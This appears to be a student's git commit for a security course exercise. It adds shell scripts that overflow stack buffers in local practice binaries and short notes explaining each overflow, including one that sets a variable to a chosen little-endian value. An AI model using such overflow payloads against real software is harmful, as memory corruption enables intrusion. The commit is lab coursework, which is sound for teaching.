feat: task 2 for sheet6

This commit is contained in:
Unbreathable
2026-06-04 18:58:56 +02:00
parent 58553b688a
commit 4ff7e162ac
8 changed files with 14 additions and 1 deletions

1
.gitignore vendored
View File

@@ -4,3 +4,4 @@ sheet01/a2/Hash.java
passwd
sheet04/AuthWithTOTP.java
sheet04/key-exchange.pcap
sheet06/a2/assign*

5
sheet06/a2/b.txt Normal file
View File

@@ -0,0 +1,5 @@
Java has bounds checking for arraycopy and other functions built-in, therefore when trying to do the same thing as before we get:
Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: arraycopy: last source index 144 out of bounds for char[128]
at java.base/java.lang.System.arraycopy(Native Method)
at assignment2b.main(assignment2b.java:14)

1
sheet06/a2/stack-a.sh Executable file
View File

@@ -0,0 +1 @@
echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | "./assignment2a"

1
sheet06/a2/stack-a.txt Normal file
View File

@@ -0,0 +1 @@
The gets function reads into a buffer with 128 bytes from stdin. So to create a buffer overflow, I just need to put in 128 characters (all of the A) and then what we want to be written where the 32 bit integer is at the end (since it's behind the buffer inside of the struct).

1
sheet06/a2/stack-c.sh Executable file
View File

@@ -0,0 +1 @@
./assignment2c AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

1
sheet06/a2/stack-c.txt Normal file
View File

@@ -0,0 +1 @@
Same idea as a here, just that we put in 64 characters this time since the buffer is only 64 characters big. This means 65 A's and the job is done.

2
sheet06/a2/stack-d.sh Executable file
View File

@@ -0,0 +1,2 @@
NUMBER=$(printf "\x74\x69\x6E\x49")
./assignment2d AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$NUMBER

1
sheet06/a2/stack-d.txt Normal file
View File

@@ -0,0 +1 @@
Since we now want to change toChange to a deterministic value, specifically 0x496e6974, I just used printf to generate the ASCII characters for this number and then passed it straight to the program with some extra stuff in front to make the buffer overflow. You just have to put the bytes in reverse order due to little endian and stuff.